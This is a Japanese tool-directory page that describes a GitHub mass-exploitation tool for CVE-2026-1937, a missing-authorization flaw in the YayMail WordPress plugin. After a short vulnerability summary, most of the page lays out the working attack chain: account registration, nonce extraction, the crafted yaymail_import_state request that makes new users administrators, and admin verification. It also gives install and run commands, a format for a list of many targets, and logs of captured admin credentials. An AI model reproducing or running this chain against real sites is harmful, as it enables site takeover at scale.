Skip to content
KitploitKITPLOIT
ツールエクスプロイトブログ
Log in
提出
ツールエクスプロイトブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-1937 — YayMail <= 4.3.2 - 'yaymail_import_state' AJAXアクションを介した認証済み(ショップマネージャー+)任意オプション更新の認可欠如 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2026-1937
認証と認可特権昇格脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミング
GitHubnxploited/cve-2026-1937

CVE-2026-1937

YayMail <= 4.3.2 - 'yaymail_import_state' AJAXアクションを介した認証済み(ショップマネージャー+)任意オプション更新の認可欠如

リポジトリを見る
145ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

タイピングSVG


🔴 脆弱性の概要

CVE-2026-1937 — 認可の欠如 → 任意オプション更新 → 権限昇格

項目詳細
CVE IDCVE-2026-1937
重大度HIGH — CVSS v3.1 スコア: 7.2
ベクターCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
研究者Daniel Basta (whizzu) — NASK PIB
公開日2026年2月17日
最終更新日2026年3月27日
影響を受けるソフトウェアYayMail – WooCommerce Email Customizer Plugin for WordPress
影響を受けるバージョン4.3.2 までの全バージョン
脆弱性の種類認可の欠如 → 不正な任意オプション更新 → 権限昇格
認証要件あり — ショップマネージャー 以上
CWECWE-862: 認可の欠如

説明:
WordPress 用プラグイン YayMail – WooCommerce Email Customizer は、4.3.2 までの全バージョンにおいて、権限昇格につながる不正なデータ変更に対して脆弱です。yaymail_import_state AJAX アクションはサーバーサイドの権限チェックなしで登録されているため、ショップマネージャーレベル以上のアクセス権を持つ認証済み攻撃者は、このアクションを自由に呼び出すことができます。細工された ZIP インポートファイルをアップロードすることで、攻撃者は WordPress サイトの任意のオプションを密かに上書きでき、新しいユーザーのデフォルト登録ロールを administrator に設定したり、一般ユーザーの登録を有効化したりすることができます。これらのオプションが注入されると、訪問者は誰でもサイトに自己登録して完全な WordPress 管理者アカウントを取得でき、サイト全体が完全に侵害されます。


🛠️ ツールの説明

これは、脆弱なバージョンの YayMail プラグインを実行している WordPress + WooCommerce 環境を標的とした、概念実証 (PoC) の大規模悪用チェーンです。このツールは、WooCommerce 登録 → ログイン → YayMail nonce 抽出 → yaymail_import_state エクスプロイト → 管理者検証という、エンドツーエンドの完全な攻撃を実装しています。

🔗 完全な攻撃チェーン

[Phase 1 — Registration]
  GET  /my-account/  →  Extract WooCommerce register nonce
  POST /my-account/  →  Register new account (WooCommerce form)
  → Save credentials to reg.txt

          ↓

[Phase 2 — Login]
  POST /wp-login.php         →  Try WordPress native login
  POST /my-account/ (WooC.)  →  Fallback WooCommerce login
  → Establish authenticated session

          ↓

[Phase 3 — Admin Pre-check]
  GET /wp-admin/  →  If already admin, skip to result

          ↓

[Phase 4 — YayMail Exploit]
  GET /wp-admin/admin.php?page=yaymail-settings
  → Extract: ajax_url + nonce

  POST /wp-admin/admin-ajax.php
  action=yaymail_import_state
  nonce=<extracted_nonce>
  import_file=yaymail_backup.zip
  → Override WordPress options:
    · default_role = administrator
    · users_can_register = 1

          ↓

[Phase 5 — Admin Verification]
  GET /wp-admin/        → Check adminmenu / wp-admin-bar
  GET /wp-admin/users.php   → Confirm manage_options access

          ↓

[Save to Nx_admin.txt]
  Format: [timestamp] https://target.com user:<u> pass:<p>

📋 要件

システム要件

  • Python 3.8 以上
  • Linux / Windows / macOS
  • yaymail_backup.zip — 細工されたインポートペイロード (必須)

Python 依存関係

pip install requests urllib3 rich

または requirements ファイルを使用:

pip install -r requirements.txt

requirements.txt:

requests>=2.28.0
urllib3>=1.26.0
rich>=13.0.0

🚀 インストール

# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-1937.git
cd CVE-2026-1937

# Install dependencies
pip install -r requirements.txt

# Place your crafted import payload in the same directory
cp /path/to/yaymail_backup.zip .

# Run the tool
python3 CVE-2026-1937.py

⚙️ 使用方法

基本的な実行方法

python3 CVE-2026-1937.py

このツールは、Rich を採用した完全対話型のターミナルインターフェースを使用します。


🗂️ ターゲットリストの形式

プレーンテキストファイル (デフォルト: list.txt) を作成し、1行に1つのターゲットを指定します:

https://target1.com
https://target2.com
http://target3.com
target4.com

http:// または https:// がないターゲットには、自動的に https:// が先頭に付加されます。


🖥️ 対話型プロンプト

Username   [Nx_admin]:          Nx_admin
Password   [Nx_adminSA]:        Nx_adminSA
Email      [[email protected]]: [email protected]
Targets file [list.txt]:        list.txt
Threads [3]:                    5
HTTP timeout (seconds) [10]:    10

📦 ペイロードファイル — yaymail_backup.zip

このエクスプロイトには、インポート時に以下の WordPress オプションを上書きする、細工された YayMail インポート ZIP ファイルが必要です:

WordPress オプション注入される値
default_roleadministrator
users_can_register1

⚠️ 作業ディレクトリに yaymail_backup.zip が存在しない場合、ツールは実行を拒否します。


🔬 脆弱な AJAX エンドポイント

POST /wp-admin/admin-ajax.php
action=yaymail_import_state
nonce=<extracted_from_yaymail_settings_page>
import_file=yaymail_backup.zip  (multipart upload)

根本原因:
yaymail_import_state ハンドラーは、インポートを処理する前に current_user_can() や同等の権限チェックを呼び出しません。shop_manager ロール (またはそれ以上) を持つユーザーは、このアクションを自由に呼び出し、ZIP インポート機能を介して wp_options テーブルの任意のエントリを上書きできます。


🔍 探索される WooCommerce ページ

このツールは、登録フォームとログインフォームを探すために以下のパスを自動的にスキャンします:

/my-account/       /my_account/      /My-account/
/account/          /myaccount/       /customer-login/
/login/            /register/        /sss/

📁 出力ファイル

ファイル説明
reg.txt認証情報を含む、成功したすべての WooCommerce 登録
Nx_admin.txt確認されたすべての管理者権限昇格

✅ 出力形式

reg.txt:

[2026-03-01 14:22:10] https://target.com user:Nx_admin email:[email protected] pass:Nx_adminSA

Nx_admin.txt:

[2026-03-01 14:22:18] https://target.com user:Nx_admin pass:Nx_adminSA | yaymail import

🖥️ ターミナル出力例

╔══════════════════════════════════════════════════════════════════╗
║  WooCommerce · YayMail · Mass Exploit Chain                      ║
║  By: Nxploited  |  GitHub: github.com/Nxploited  |  @Kxploit    ║
╚══════════════════════════════════════════════════════════════════╝

[SCAN]            https://target.com
[REGISTERED]      https://target.com  ::  user: Nx_admin pass: Nx_adminSA
[LOGIN-WP]        https://target.com  ::  wp-login.php
[SEARCH-NONCE]    https://target.com  ::  not admin, trying YayMail chain
[NONCE-FOUND]     https://target.com  ::  nonce: a1b2c3d4e5
[EXPLOIT]         https://target.com  ::  nonce: a1b2c3d4e5
[SUCCESS]         https://target.com  ::  user: Nx_admin pass: Nx_adminSA

┌──────────────────────────────────────���───────────────────────────────────┐
│ Target               │ Status                    │ Credentials / Note    │
├──────────────────────────────────────────────────────────────────────────┤
│ https://target.com   │ ✅ EXPLOITED (ADMIN VERIFIED) │ user: Nx_admin …  │
│ https://target2.com  │ NO-REGISTER               │                       │
│ https://target3.com  │ DEAD                      │                       │
└──────────────────────────────────────────────────────────────────────────┘

📊 ステータスコード一覧

ツールをダウンロード